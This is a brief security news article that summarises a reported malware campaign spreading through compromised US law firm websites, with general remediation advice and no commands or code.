US Law Firm Websites Hacked to Distribute Malware and Ransomware Threats

Post Views: 161

GrayCharlie Threat Operation

A financially motivated threat operation, known as GrayCharlie, has been identified as leveraging compromised websites of US law firms to spread various malware strains.

Compromised Law Firm Websites

The campaign, which has been linked to the SmartApeSG operation, involves the use of hacked WordPress sites to deploy NetSupport RAT, Stealc, and SectopRAT payloads.

According to an analysis by Recorded Future’s Insikt Group, the compromised law firm sites were breached through a shared IT or marketing provider.

Attack Vector

The attackers injected malicious links into the websites, which redirected visitors to fake browser update pages or CAPTCHAs. These pages tricked users into executing a PowerShell command through the Windows Run dialog, resulting in the installation of NetSupport RAT.

Post-Infection Activity

Once installed, NetSupport RAT established a connection with GrayCharlie’s command-and-control servers, enabling the threat actors to conduct surveillance, perform file operations, and deliver additional malware, including the Stealc infostealer and SectopRAT.

Infrastructure

The attack infrastructure supporting GrayCharlie is hosted by MivoCloud and HZ Hosting Ltd.

Mitigation and Recommendations

To mitigate the threat posed by GrayCharlie, researchers recommend blocking IP addresses and domains associated with NetSupport RAT, Stealc, and SectopRAT. Additionally, organizations should implement updated YARA, Sigma, and Snort rules, as well as enhance their web filtering mechanisms.

Conclusion

The GrayCharlie operation highlights the risks associated with supply chain attacks, where compromised third-party providers can be used to spread malware to multiple organizations. Law firms and other organizations are advised to be vigilant in monitoring their websites and networks for signs of compromise and to implement robust security measures to prevent such attacks.